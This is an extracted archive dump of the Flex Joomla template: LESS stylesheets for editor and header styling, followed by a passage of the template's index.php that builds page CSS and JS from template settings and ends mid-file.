	//Edit
	select.inputbox,
	select {
		width: 250px;
		max-width: 100%;
	}

	.btn-toolbar {
		margin-bottom: 20px;
		
		.btn {
			.fa, .fas {
				margin-right:3px;
				margin-left:-3px;
				
				&.fa-archive {
					margin-right:6px;
				}
			}
		}
	}

	.tab-content {
		padding-top: 20px;
	}

	#editor-xtd-buttons,
	.toggle-editor {
		margin-top: 20px;
	}

	.btn-group input[type="radio"] {
		display: none;
	}

}

/*======================================
 *======= 	 Media   ============
 *=====================================*/

iframe, svg {
	max-width: 100%;
}

#sbox-content > iframe {
	height: 100%;
}

.alert.alert-message {
	background-color: #dff0d8;
	border-color: #d6e9c6;
	color: #468847;
	h4 {
		color: #468847;
	}
}

.manager.thumbnails {
  
  list-style: none;
  padding: 0;
  margin: 0 0 0 -20px;

	li {
		text-align: center;
		display: block;
		float: left;
		width: 80px;
		height: 80px;
		line-height: 18px;
		border: 1px solid #ddd;
		-webkit-border-radius: 4px;
		-moz-border-radius: 4px;
		border-radius: 4px;
		-webkit-box-shadow: 0 1px 3px rgba(0,0,0,0.055);
		box-shadow: 0 1px 3px rgba(0,0,0,0.055);
		position: relative;

		[class^="icon-"],
		[class*=" icon-"] {
			font-size: 14px;
			line-height: 14px;
			color: #08c;
			display: inline-block;
			margin-top: 6px;
		}

		.height-50 {
			margin-top: 4px;
			height: 50px;
			margin-bottom: 4px;
		}

		a {
			text-decoration: none;
			color: #08c;
			font-size: 13px;
		}

		&:hover {
			background: #f7fcff;
			border-color: rgba(82,168,236,0.8);
			-webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(82,168,236,.6);
			-moz-box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(82,168,236,.6);
			box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(82,168,236,.6);
			-webkit-transition: all 400ms;
			transition: all 400ms;
		}
	}
}

#mailto-window {
	margin: 20px;
	>h2 {
		font-size: 18px;
		margin-top: 0;
	}
	input[type="text"] {
		height: auto !important;
	}
}

//Choosen
.chzn-container.chzn-container-multi {
	input[type="text"] {
		min-height: 30px;
	}
}

// SP Post Formats
#sppostformats{
	
	.sp-image-upload-wrapper {
		width:300px;
		margin:0 0 20px 0;
		
		img {
			width:300px;
			margin:0;
			padding:0;
			position:relative;
			object-fit: cover;
		}
	}
	
	.post-formats {
		padding:0!important;
		border-radius: 4px;
		margin:0 0 10px;
		label {
			border:1px solid #bbb;
			padding:7px 12px;
			margin:0 0 10px -1px;
		}	
		
	}
	.controls {
		input {
			min-width:460px;
		}
	}
	
	textarea{
		min-width: 460px;
		width:99%;
		min-height: 120px;
	}
	.sp-gallery-field {
		ul.sp-gallery-items {
			li {
				height:100px;
				width:180px;
				a.btn-remove-image {
					padding:5px 12px;
				}
				
				img {
					width:180px;
					margin:0;
					padding:0;
					object-fit: cover;

				}
				
			}
		}
		.btn-sp-gallery-item-upload {
			border:1px solid fade(black, 15%);
			background-color: lighten(@major_color, 10%);
			color:#fff;
			text-shadow:1px 1px 1px rgba(0,0,0,0.3);
			
			&:hover {
				background-color: @major_color;
			}
		}
	}
}

.flex-edit {
	.fa-archive {
		margin-right:7px;
	}
}

div#images {
	overflow:hidden;
}

.sppb_article_edit {
	margin:0 auto 25px;
 	> a {
		border:1px solid lighten(@major_color, 5%);
		background:darken(gray, 8%);
		padding:11px 25px;
		border-radius:4px;
		color:#fff;
		text-shadow:1px 1px 2px rgba(0,0,0,.2);
		
		&:hover {
			border:1px solid darken(@major_color, 5%);
			background:darken(gray, 15%);
		}
	}
}

.edit-article {
	margin:0;
	float:right;
	display:inline-block;
	position:relative;
	width:100px;
	z-index:2;
}
.btn.dropdown-toggle {
	border:1px solid lighten(@major_color, 5%);
	background:transparent;
	padding:5px;
	color:#777;
	
	&:before {
		font-family: 'peIcon7';
		content: "\e62c";
		font-size:21px;
		line-height:24px;
		margin:0 7px 0 10px;
		
	}
	&:hover {
		border:1px solid darken(@major_color, 5%);
		color:#444;
	}
	.icon-cog {
		display:none;
	}
	.caret {
		margin:12px 8px 0 0;
		vertical-align:top;
	}
}
.media-preview.add-on {
		height:34px;
		margin-left:1px;
		background:#f9f9f9;
		width:42px;

	> .hasTipPreview {
		line-height:26px;
		
		&:before {
			font-family:'Font Awesome 5 Free';
			font-weight:900;
			content:"\f06e";
			font-style:normal;
		}
	}
}

.controls .input-append a.modal.btn,
a.modal.btn{
	position:relative!important;
    background:lighten(@major_color, 5%);
	line-height:16px;
	color:#fff;
	z-index:1;
	&:hover {
		background:darken(@major_color, 5%);
	}
}
a.btn.hasTooltip {
	position:absolute;
    line-height:16px;
	padding-left:4px;
	padding-right:4px;
	display:inline-block;
	background:#eee;
	border:1px solid #ccc;
	text-align:center;

}
.icon-remove {
	background-image:none;
	font-style:normal;
	padding-left:12px;
	padding-right:12px;
	&:before {
		font-family:'Font Awesome 5 Free';
		font-weight:900;
		content:"\f00d";
		font-style:normal;
	}
}
.calendar {
	table {
		width:100%;	
		background: #e0e0e0;
		
		.button {/* "<<", "<", ">", ">>" buttons have this class */
			border-radius:0;
			background:#999;
			border:1px solid rgba(0,0,0,0.2);
			display:table-cell;
			&:hover {
				background: #333;
				color:#fff;
			}
		}
		tbody td {
			text-align:center!important;
		}
	}
}
	
.input-append button[id^="jform_publish"] {
	background:lighten(@major_color, 5%);
	line-height:1;
	padding-left:16px;
	padding-right:15px;
	//color:#fff;
	&:hover {
		background:darken(@major_color, 5%);
	}
}

textarea#jform_metadesc {
	min-width:470px;
	min-height:150px;
}

/* Bootstrap (new) Calendar */
.js-calendar {
	min-width:264px;
	width:auto;
	padding:8px!important;
	background:rgba(255,255,255,0.9);
	border-radius:5px!important;
	.buttons-wrapper {
		.btn-exit, .btn-today, .btn-clear {
			margin:3px;
			padding:5px 18px;
			border-radius:4px!important;
			text-align:center;
			border:1px solid #ddd;
		}
	}
}
PK!`�W���flex/less/headers.lessnu&1i�/**
 * Flex @package Helix Framework
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/


/* Centering content */
.centered, .addspace {
	.container, .container-fluid {	
		>.row {
			.flexbox();
			.flex-justify-content(center);
			margin:0 auto;
			padding:0;	
		}
	}
}

#sp-logo {
	.flexbox();
	.flex-align-items();
	.flex-justify-content(start); /* (start) will move it to the left (LTR), where (center) to center; */
	z-index:10;
	
		.sp-default-logo,
		.sp-retina-logo {
			max-height:100%; /* fix when Logo graphic (image) is too wide (large) */
			width:auto;
		}
}
a.logo {
  .sp-retina-logo {
  	display: none; // hiding retina logo from non-retina devices
  }
}



/*=========================================
*======= 	Start  Header	   ============
*=======================================*/
#sp-header{
	
	position:relative;
	top:0;
	
	&:before {
		content:"";
		// Backdrop filter added in Flex 3.9.3
		-webkit-backdrop-filter: blur(7px);
		backdrop-filter: blur(7px);
		position:absolute;
		top:0;
		left:0;
		right:0;
		bottom:0;
		width:100%;
		height:auto;
	}

	#sp-menu {
		
		.sp-column {
			.sp-megamenu-parent {
				float:right;
				>li {
					>a {

						>.pe {
							font-size:125%;
							text-align:center;
							vertical-align:middle;
							line-height:1;
							margin-top:-3px;
				
						}
					}
				}
			}
		}
		.sp-menu-item {
			>a {
				>img {
					max-height:20px;/* image icon */
					max-width:20px;
					display:inline;
					margin:-2px 7px 0 0;
				}
			}
			.pe {
				font-size:120%;
				
				vertical-align:middle;
				line-height:1;
				margin:-2px auto 0;
	
			}
			&.bold {
				.pe {
					font-weight:600;
				}
			}
			.sp-module {
				margin:2px auto 0;
			}
		}
		
		.sp-dropdown {
			.sp-dropdown-inner {
				border-radius:0 0 3px 3px;
				background: rgba(40,40,40,.8); /* starting color */
				li.sp-menu-item {
					>a {
						color:#f7f7f7; /* starting color */
					}
				}
			}
		}
	}
	// Logo
	.logo {
		margin:auto;
		.flexbox();
		.flex-align-items();
		
		h1 {
			font-size: 24px;
			line-height: 1;
			margin: 0;
			padding: 0;
			vertical-align: middle;	
		}

		p {
			margin: 5px 0 0;
		}
	}
	
	&.white,
	&.transparent-white,
	&.onepage  {
		#sp-menu {
			.sp-dropdown {
				.sp-dropdown-inner {
					background: fade(white, 80%); /* starting color */
					
					li.sp-menu-item {
						>a {
							color:@text_color; /* starting color */
						}
					}
				}
			}
		}
	}
}

/* Transparent Wrapper */
.transparent-wrapper {
	position:absolute;
	right:0;
	left:0;
	z-index:9;
	margin:0 auto;
	padding:0;

	header.transparent {
		background:transparent;
	}
	.onepage, .white {
		background: fade(white, 80%); /* starting color */
		box-shadow:0 2px 6px fade(black, 10%);
		
		
		.sp-megamenu-parent li a {
			color:@text_color;
		}
		
	}
	
}

/* Header AddSpace */
#sp-header {

	&.addspace {
		
		>.container, >.container-fluid {
			padding:0;
			>.row {
				.flexbox();
				.flex-justify-content(center);
				margin:0 auto;
				padding:0;
			}
		}
	
		#sp-menu {
			
			width:auto;
			padding:0;
			
			.sp-column.centered {		
				margin:0 auto;
			}
		}
		.vmCartModule {
			top:0;
			left:0;
			position:absolute;
		}
		#cart-menu {
		
			padding:0;
			margin-left:-15px;
			display:block;
	
			.cd-cart {
				.transition(background 0.3s);
				
				i {
					display:block;
					width:90px;
					text-align:center;
				}
				.total_products {
					right:18px;
				}
			}
			&.shopping-menu-is-open {
				padding:0;
				
				.cd-cart {
					height:100vh;

					
					i {
						text-align:center;
					}
					.total_products {
						right:18px;
					}
				}
			}
		}
	}
}
section.addspace {
	padding-top:10px;
	padding-bottom:10px;
	
	#sp-addspace {
		.sp-column {
			>div {
			 padding-top:10px;
			 padding-bottom:10px;
			}
		}
	}
}

	
/* Header Centered (Logo/Menu) */
#sp-header {
	&.centered {
		
		>.container, >.container-fluid {
			padding:0;
			>.row {
				.flexbox();
				//.flex-align-items();
				.flex-justify-content(center);
				margin:0 auto;
				padding:0;
			}
		}
		
		#sp-menu {
			width:auto;
			padding:0;
			
			.sp-column.centered {		
				margin:0 auto;
				padding:0;
			}
		}
		
		#cart-menu {
			padding:0;
			margin-left:-15px;
			display:block;
	
			.cd-cart {

				.transition(background 0.3s);
				
				i {
					display:block;
					//width:90px;
					
					text-align:center;
				}
				.total_products {
					
					right:18px;
				}
			}
			&.shopping-menu-is-open {
				padding:0;
			
				.cd-cart {
					height:100vh;
					
					i {
						text-align:center;
					}
					.total_products {
						right:20px;
					}
				}
			}
		}
	}
}

.sp-column.centered {
	text-align:center;
	margin:0 auto;
	padding:0;
	
	.flexbox();
	.flex-align-items(center);
	.flex-justify-content(center);
	>a,
	>div{
		
		text-align:left;
		display:table;
		margin:0 auto;
		padding:0;
	}
	
}


/* Transparent Header */
#sp-header {
	
	&.transparent {	
	
		/* Backdrop filter added in Flex 3.9.3 */
		&:before {
			-webkit-backdrop-filter: blur(0);
			backdrop-filter: blur(0);
		}	

		
		&.shadow:before {
			content:" ";
			position:absolute;
			height:120px;
			width:100%;
			background: -moz-linear-gradient(top, rgba(0,0,0,0.4) 0%, transparent 100%);
			background: -webkit-gradient(left top, left bottom, color-stop(0%, rgba(0,0,0,0.4)), color-stop(100%, transparent));
			background: -webkit-linear-gradient(top, rgba(0,0,0,0.4) 0%, transparent 100%);
			background: -o-linear-gradient(top, rgba(0,0,0,0.4) 0%, transparent 100%);
			background: -ms-linear-gradient(top, rgba(0,0,0,0.4) 0%, transparent 100%);
			background: linear-gradient(to bottom, rgba(0,0,0,0.4) 0%, transparent 100%);
		}
		
	}
	&.color {
		box-shadow: none;
	}
	&.sticky-top {		
		/* Backdrop filter added in Flex 3.9.3 */
		&:before {
			-webkit-backdrop-filter: blur(0);
			backdrop-filter: blur(0);
		}
	}

}

@media only screen and (-webkit-min-device-pixel-ratio: 1.5),
only screen and (min--moz-device-pixel-ratio: 1.5),
only screen and (-o-min-device-pixel-ratio: 3/2),
only screen and (min-device-pixel-ratio: 1.5),
only screen and (min-resolution: 192dpi) {
  a.logo {
    .sp-default-logo {
    	display: none;
    }
    .sp-retina-logo {
    	display: block;
		width:auto;
    }
  }
}

PK!G�UNUNflex/index.phpnu�[���<?php
/**
 * Flex @package Helix Framework
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
//no direct access
defined ('_JEXEC') or die ('restricted access');

$doc = JFactory::getDocument();
$app = JFactory::getApplication();
$menu = $app->getMenu()->getActive();

JHtml::_('jquery.framework');
JHtml::_('bootstrap.framework', true, true); //Force load Bootstrap
unset($doc->_scripts[$this->baseurl . '/media/jui/js/bootstrap.min.js']); // Remove joomla core bootstrap

//Load Helix
$helix3_path = JPATH_PLUGINS . '/system/helix3/core/helix3.php';

if (file_exists($helix3_path)) {
    require_once($helix3_path);
    $this->helix3 = helix3::getInstance();
} else {
    die('Please install and activate helix plugin');
}

// Remove the generator meta tag
if($this->params->get('remove_joomla_generator')) {
  $this->setGenerator(null);
}

// FontAwesome 5. FontAwesome 5 is enabled in template, there is no reason to load it twice (from SP Page Builder)
$sppb_params = JComponentHelper::getParams('com_sppagebuilder');
if ($sppb_params->get('fontawesome',1)) {
	unset($this->_styleSheets[$this->baseurl .'/components/com_sppagebuilder/assets/css/font-awesome-5.min.css']);
	unset($this->_styleSheets[$this->baseurl .'/components/com_sppagebuilder/assets/css/font-awesome-v4-shims.css']);
} 

//Coming Soon
if($this->helix3->getParam('comingsoon_mode')) header("Location: ".$this->baseUrl."?tmpl=comingsoon");

//Class Classes
$body_classes = '';
if ($this->helix3->getParam('sticky_header')) {
    $body_classes .= 'sticky-header ';
}
$body_classes .= ($this->helix3->getParam('boxed_layout', 0)) ? 'layout-boxed' : 'layout-fluid';

//Body Background Image
if ($bg_image = $this->helix3->getParam('body_bg_image')) {
	
    $body_style = 'background-image: url(' . JURI::base(true) . '/' . $bg_image . ');';
    $body_style .= 'background-repeat: ' . $this->helix3->getParam('body_bg_repeat') . ';';
    $body_style .= 'background-size: ' . $this->helix3->getParam('body_bg_size') . ';';
    $body_style .= 'background-attachment: ' . $this->helix3->getParam('body_bg_attachment') . ';';
    $body_style .= 'background-position: ' . $this->helix3->getParam('body_bg_position') . ';';
    $body_style = 'body.site {background-color:'.$this->helix3->PresetParam('_bg').';' . $body_style . '}';

    $doc->addStyledeclaration($body_style);
} else {
	$body_style = 'body.site {background-color:'.$this->helix3->PresetParam('_bg').';}';
	$doc->addStyledeclaration($body_style);
}

//Boxed Layout Width 
if ($this->params->get('boxed_layout') == 1) { 
	$boxed_background_color = '';
	
	$boxed_sticky_header = '
	.layout-boxed .sticky,
	.layout-boxed .sticky .sticky__wrapper,
	.layout-boxed .sticky .sticky__wrapper .sp-megamenu-parent .sp-dropdown{
		max-width:'.$this->helix3->getParam('boxed_layout_width').'px;
		margin:0 auto;
	}';

	if ($this->params->get('boxed_background_color') != '') { 
		$boxed_background_color = 'background-color:'.$this->helix3->getParam('boxed_background_color').';box-shadow:0 0 7px rgba(0,0,0,0.2);';
	} 
	$body_innerwrapper_overflow = '';
	
	if ($this->helix3->getParam('boxed_layout_spacing') != 0) { 
		$boxed_layout_spacing = 'margin:' . $this->helix3->getParam('boxed_layout_spacing') . 'px auto;';
		$boxed_layout_spacing .= $boxed_background_color;
		$boxed_layout_spacing .= 'max-width:'.$this->helix3->getParam('boxed_layout_width').'px;';
		$boxed_layout_spacing = 'body.layout-boxed .body-wrapper {margin:-' . $this->helix3->getParam('boxed_layout_spacing') . 'px auto 0;padding:' . $this->helix3->getParam('boxed_layout_spacing') . 'px 0 0;}body.layout-boxed .body-innerwrapper {' . $boxed_layout_spacing . '}
		';
		$doc->addStyledeclaration($boxed_layout_spacing);
	} else {
		$boxed_layout_spacing = $boxed_background_color;
		$boxed_layout_spacing .= 'max-width:'.$this->helix3->getParam('boxed_layout_width').'px;';
		$boxed_layout_spacing = 'body.layout-boxed .body-innerwrapper {' . $boxed_layout_spacing . '}
		';
		$doc->addStyledeclaration($boxed_layout_spacing);
	}
} else { 
	$body_innerwrapper_overflow = ' body_innerwrapper_overflow';
	$boxed_sticky_header = '';
}
		
//Body Font
$webfonts = array();

if ($this->params->get('enable_body_font')) {
    $webfonts['body'] = $this->params->get('body_font');
}

//Heading1 Font
if ($this->params->get('enable_h1_font')) {
    $webfonts['h1'] = $this->params->get('h1_font');
}

//Heading2 Font
if ($this->params->get('enable_h2_font')) {
    $webfonts['h2'] = $this->params->get('h2_font');
}

//Heading3 Font
if ($this->params->get('enable_h3_font')) {
    $webfonts['h3'] = $this->params->get('h3_font');
}

//Heading4 Font
if ($this->params->get('enable_h4_font')) {
    $webfonts['h4'] = $this->params->get('h4_font');
}

//Heading5 Font
if ($this->params->get('enable_h5_font')) {
    $webfonts['h5'] = $this->params->get('h5_font');
}

//Heading6 Font
if ($this->params->get('enable_h6_font')) {
    $webfonts['h6'] = $this->params->get('h6_font');
}

//Navigation Font
if ($this->params->get('enable_navigation_font')) {
    $webfonts['.sp-megamenu-parent'] = $this->params->get('navigation_font');
}

//Custom Font
if ($this->params->get('enable_custom_font') && $this->params->get('custom_font_selectors')) {
    $webfonts[$this->params->get('custom_font_selectors')] = $this->params->get('custom_font');
}

$this->helix3->addGoogleFont($webfonts);


// SmoothScroll.js
if ($this->params->get('smooth_scroll_version') == '0') { 
	$smooth_scroll_js = '';
} else if ($this->params->get('smooth_scroll_version') == '2') { 
	$smooth_scroll_js = 'SmoothScroll-1.4.9.js, ';
} else if ($this->params->get('smooth_scroll_version') == '3') { 
	$smooth_scroll_js = 'SmoothScroll-1.4.10.js, ';
} else {
	$smooth_scroll_js = 'SmoothScroll.js, ';
}
	
	$js_vars = '
	var sp_preloader = "' . $this->params->get('preloader') . '";
	var sp_offanimation = "' . $this->params->get('offcanvas_animation') . '";
	var stickyHeaderVar = "' . $this->params->get('sticky_header') . '";

	';
	  
	if ($this->params->get('sticky_header') == 1) {
		$stickyHeaderAppearVar = ($this->helix3->getParam('sticky_header_appear_point')) ? 'var stickyHeaderAppearPoint = ' . $this->params->get('sticky_header_appear_point') . ';' : 'var stickyHeaderAppearPoint = 250;';
	} else {
		$stickyHeaderAppearVar = '';
	}
	 
	$all_js_vars = $js_vars . $stickyHeaderAppearVar;
	$all_js_vars = preg_replace(array('/([\s])\1+/', '/[\n\t]+/m'), '', $all_js_vars); // Remove whitespace
	$doc->addScriptdeclaration($all_js_vars);
		
?>
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php echo $this->language; ?>" lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>">
        <head>
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <?php
            if ($favicon = $this->helix3->getParam('favicon')) {
                $doc->addFavicon(JURI::base(true) . '/' . $favicon);
            } else {
                $doc->addFavicon($this->helix3->getTemplateUri() . '/images/favicon.ico');
            }
        ?>
          <script data-ad-client="ca-pub-4943184624431596" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
        <!-- head -->
        <jdoc:include type="head" />
                <?php			
                $preloader_bg = ($this->helix3->getParam('preloader_bg')) ? $this->helix3->getParam('preloader_bg') : 'rgba(245,245,245,0.43)';
                $preloader_tx = ($this->helix3->getParam('preloader_tx')) ? $this->helix3->getParam('preloader_tx') : '#f5f5f5';
				
				// FontAwesome icons (fa-v4-shims.css is for support older FA4 icons
				$font_awesome_5 = ',font-awesome.min.css,fa-v4-shims.css';
				
                // load css, less and js
                $this->helix3->addCSS('bootstrap.min.css'. $font_awesome_5) // CSS Files
                        ->addJS('bootstrap.min.js, '.$smooth_scroll_js.'jquery.easing.min.js, main.js') // JS Files
                        ->lessInit()->setLessVariables(array(
                            'preset' => $this->helix3->Preset(),
                            'bg_color' => $this->helix3->PresetParam('_bg'),
                            'text_color' => $this->helix3->PresetParam('_text'),
                            'major_color' => $this->helix3->PresetParam('_major'),
                            'preloader_bg' => $preloader_bg,
                            'preloader_tx' => $preloader_tx,
                        ))
                        ->addLess('legacy/bootstrap', 'legacy')
                        ->addLess('master', 'template');
			
                //RTL
                if ($this->direction == 'rtl') {
                    $this->helix3->addCSS('bootstrap-rtl.min.css')
                            ->addLess('rtl', 'rtl');
                }

                $this->helix3->addLess('presets', 'presets/' . $this->helix3->Preset(), array('class' => 'preset'));

                //Before Head
                if ($before_head = $this->helix3->getParam('before_head')) {
                    echo $before_head . "\n";
           		}
				
         ?>
    </head>
    <body class="<?php echo $this->helix3->bodyClass($body_classes); ?> off-canvas-menu-init">
    
    	<?php // added class "body-wrapper". It was only "off-canvas-menu-wrap" before. ?>
        <div class="body-wrapper off-canvas-menu-wrap">
            <div class="body-innerwrapper<?php echo $body_innerwrapper_overflow; ?>">
    			<?php $this->helix3->generatelayout(); ?>
            </div> <!-- /.body-innerwrapper -->
        </div> <!-- /.body-wrapper -->
        
        <!-- Off Canvas Menu -->
        <div class="offcanvas-menu">
            <a href="#" class="close-offcanvas" aria-label="Close"><i class="fa fa-remove" aria-hidden="true"></i></a>
            <div class="offcanvas-inner">
                <?php if ($this->helix3->countModules('offcanvas')) { ?>
                    <jdoc:include type="modules" name="offcanvas" style="sp_xhtml" />
                    <?php } else { ?>
                    <p class="alert alert-warning">
                    <?php echo JText::_('HELIX_NO_MODULE_OFFCANVAS'); ?>
                    </p>
    	<?php } ?>
            </div> <!-- /.offcanvas-inner -->
        </div> <!-- /.offcanvas-menu -->

        <?php
		// Header (new from Flex 3.0)
		$header_height = ($this->helix3->getParam('header_height')) ? $this->helix3->getParam('header_height') : '90';
		$sticky_header_height = ($this->helix3->getParam('sticky_header_height')) ? $this->helix3->getParam('sticky_header_height') : '75';
		$header_link_color = ($this->helix3->getParam('header_link_color')) ? 'color:'. $this->helix3->getParam('header_link_color') : '';
		$header_active_link_color = ($this->helix3->getParam('header_active_link_color')) ? $this->helix3->getParam('header_active_link_color') : '';
		$headerbgcolor = ($this->helix3->getParam('headerbg')) ? 'background:'. $this->helix3->getParam('headerbg') .';' : '';
		$stickybgcolor = ($this->helix3->getParam('stickybg')) ? 'background:'. $this->helix3->getParam('stickybg') .';' : '';
		$mega_dropdown_bg = ($this->helix3->getParam('mega_dropdown_bg')) ? 'background:'. $this->helix3->getParam('mega_dropdown_bg') : '';
		$mega_dropdown_color = ($this->helix3->getParam('mega_dropdown_color')) ? 'color:'. $this->helix3->getParam('mega_dropdown_color') : '';
		$sticky_appearance_animation = ($this->helix3->getParam('sticky_appearance_animation')) ? '-webkit-animation-name:'. $this->helix3->getParam('sticky_appearance_animation') .';animation-name:'. $this->helix3->getParam('sticky_appearance_animation') .';' : '-webkit-animation-name:fade-in-down;animation-name:fade-in-down;';
		$sticky_appearance_none = ($this->helix3->getParam('sticky_appearance_animation') == 'none') ? '-webkit-transition:none;-moz-transition:none;-o-transition:none;transition:none;' : '';
		
		$sticky_header_link_color = ($this->helix3->getParam('sticky_header_link_color')) ? 'color:'. $this->helix3->getParam('sticky_header_link_color') : '';
		$sticky_header_active_link_color = ($this->helix3->getParam('sticky_header_active_link_color')) ? $this->helix3->getParam('sticky_header_active_link_color') : '';
		
		// Off-canvas
		$offcanvas_bg = ($this->helix3->getParam('offcanvas_bg')) ? 'background:'. $this->helix3->getParam('offcanvas_bg') : '';
		$offcanvas_color = ($this->helix3->getParam('offcanvas_color')) ? $this->helix3->getParam('offcanvas_color') : '';
		$offcanvas = '.offcanvas-menu{'. $offcanvas_bg .'}.offcanvas-menu ul li a{color: '. $offcanvas_color .'}.offcanvas-menu .offcanvas-inner .search input.inputbox{border-color: '. $offcanvas_color .'}';
		$doc->addStyledeclaration($offcanvas);
		
		$header_styling = '
		#sp-header .top-search-wrapper .icon-top-wrapper,
		#sp-header .top-search-wrapper .icon-top-wrapper >i:before,
		.sp-megamenu-wrapper > .sp-megamenu-parent >li >a,
		.sp-megamenu-wrapper #offcanvas-toggler,
		#sp-header .modal-login-wrapper span,
		#sp-header .ap-my-account i.pe-7s-user,
		#sp-header .ap-my-account .info-text,
		#sp-header .mod-languages,
		#sp-header .logo,
		#cart-menu,
		#cd-menu-trigger,
		.cd-cart,
		.cd-cart > i{  
			height:' . $header_height . 'px;
			line-height:' . $header_height . 'px;
		}
		.total_products{top:calc('. $header_height .'px / 2 - 22px);}
		#sp-header,
		.transparent-wrapper{
			height:' . $header_height . 'px;
			'.$headerbgcolor.'
		}
		.transparent,
		.sticky-top{
			'.$headerbgcolor.'
		}
		#sp-header #sp-menu .sp-megamenu-parent >li >a,
		#sp-header #sp-menu .sp-megamenu-parent li .sp-dropdown >li >a,
		#sp-header .top-search-wrapper .icon-top-wrapper i,
		#sp-header #cd-menu-trigger i,
		#sp-header .cd-cart i,
		#sp-header .top-search-wrapper{'. $header_link_color .'}
		#sp-header #sp-menu .sp-dropdown .sp-dropdown-inner{'. $mega_dropdown_bg .'}
		#sp-header #sp-menu .sp-dropdown .sp-dropdown-inner li.sp-menu-item >a,
		#sp-header #sp-menu .sp-dropdown .sp-dropdown-inner li.sp-menu-item.separator >a,
		#sp-header #sp-menu .sp-dropdown .sp-dropdown-inner li.sp-menu-item.separator >a:hover,
		#sp-header .sp-module-content ul li a,
		#sp-header .vm-menu .vm-title{'. $mega_dropdown_color .'}		
		';
		// Onepage
		if ($this->helix3->getParam('header_active_link_color') != '') { 
			$active_link_color = '
			#sp-header #sp-menu .sp-megamenu-parent >li.active a,
			#sp-header #sp-menu .sp-megamenu-parent >li.current-item >a,
            #sp-header #sp-menu .sp-megamenu-parent >li.current-item.active>a,
			#sp-header #sp-menu .sp-megamenu-parent >li.sp-has-child.active >a,	
			#offcanvas-toggler >i,
			#offcanvas-toggler >i:hover{color:'. $header_active_link_color .'}
			#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.current-item>a,
			#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.current-item.active>a,
			#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.current-item.active:hover>a,
			#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item a:hover{
			  color: #fff;
			  background-color:'. $header_active_link_color .';
			}
			#sp-header.onepage .sp-megamenu-parent li.active a,
			#sp-header.onepage .sp-megamenu-parent li.active:first-child >a.page-scroll{
				color:'. $header_active_link_color .';
				border-bottom-color:'. $header_active_link_color .';
			}
			';
		} else {
			$active_link_color = '';
		}
		
		if ($this->params->get('sticky_header') == 1) { 
			$sticky_header_styling = '
			.sticky .logo,
			.sticky #cart-menu,
			.sticky #cd-menu-trigger,
			.sticky .cd-cart,
			.sticky .cd-cart >i,
			.sticky .menu-is-open >i,
			#sp-header.sticky .modal-login-wrapper span,
			#sp-header.sticky .ap-my-account i.pe-7s-user,
			#sp-header.sticky .ap-my-account .info-text,
			#sp-header.sticky .mod-languages,
			#sp-header.sticky .top-search-wrapper .icon-top-wrapper,
			#sp-header.sticky .top-search-wrapper .icon-top-wrapper >i:before,
			.sticky .sp-megamenu-wrapper > .sp-megamenu-parent >li >a,
			.sticky .sp-megamenu-wrapper #offcanvas-toggler,
			.sticky #sp-logo a.logo{ 
				height:'.$sticky_header_height.'px;
				line-height:'.$sticky_header_height.'px;
			 }
			 .sticky .total_products{top: calc('. $sticky_header_height .'px / 2 - 22px);}
			 .sticky .sticky__wrapper{
				'.$stickybgcolor.'
				 height:'.$sticky_header_height.'px;
				 '. $sticky_appearance_none . $sticky_appearance_animation .'
			}
			'. $boxed_sticky_header .'
			.sticky .sticky__wrapper .sp-sticky-logo {
				height:'.$sticky_header_height.'px;
			}
			.sticky.onepage .sticky__wrapper,
			.sticky.white .sticky__wrapper,
			.sticky.transparent .sticky__wrapper{
				'.$stickybgcolor.'
			} 
			#sp-header.sticky #sp-menu .sp-megamenu-wrapper .sp-megamenu-parent >li >a,
			#sp-header.sticky .top-search-wrapper,
			#sp-header.sticky .top-search-wrapper .icon-top-wrapper i,
			#sp-header.sticky #cd-menu-trigger i,
			#sp-header.sticky .cd-cart i{
				'. $sticky_header_link_color .';
			}	
			#sp-header.sticky #sp-menu .sp-megamenu-wrapper .sp-megamenu-parent >li.active>a,
			#sp-header.sticky #sp-menu .sp-megamenu-wrapper .sp-megamenu-parent >li.current-item>a,
			#sp-header.sticky #sp-menu .sp-megamenu-wrapper .sp-megamenu-parent >li.sp-has-child.active>a,
			.sticky #offcanvas-toggler >i,
			.sticky #offcanvas-toggler >i:hover{
				color:'. $sticky_header_active_link_color .';
			}
			 ';
			 
			$header_css = $header_styling . $active_link_color . $sticky_header_styling;
			$header_css = preg_replace(array('/([\s])\1+/', '/[\n\t]+/m'), '', $header_css); // Remove whitespace
			$doc->addStyledeclaration($header_css);
		} else { 
			$header_css = $header_styling . $active_link_color;
			$header_css = preg_replace(array('/([\s])\1+/', '/[\n\t]+/m'), '', $header_css); // Remove whitespace
			$doc->addStyledeclaration($header_css);
		}
		
		//Custom CSS
		if ($custom_css = $this->helix3->getParam('custom_css')) {
			$doc->addStyledeclaration($custom_css);
		}
		
		//Custom JS
		if ($custom_js = $this->helix3->getParam('custom_js')) {
			$doc->addScriptdeclaration($custom_js);
		}


        if ($this->params->get('compress_css')) {
            $this->helix3->compressCSS();
        }
		
		
		$tempOption = $app->input->get('option');

		if ( $this->params->get('compress_js') && $tempOption != 'com_config' ) {
                $this->helix3->compressJS($this->params->get('exclude_js'));
		}
		

		//before body
		if ($before_body = $this->helix3->getParam('before_body')) {
			echo $before_body . "\n";
		} 
        
        // Removes: jQuery(window).on('load', function() {new JCaption('img.caption');});
        if (isset($this->_script['text/javascript'])) {
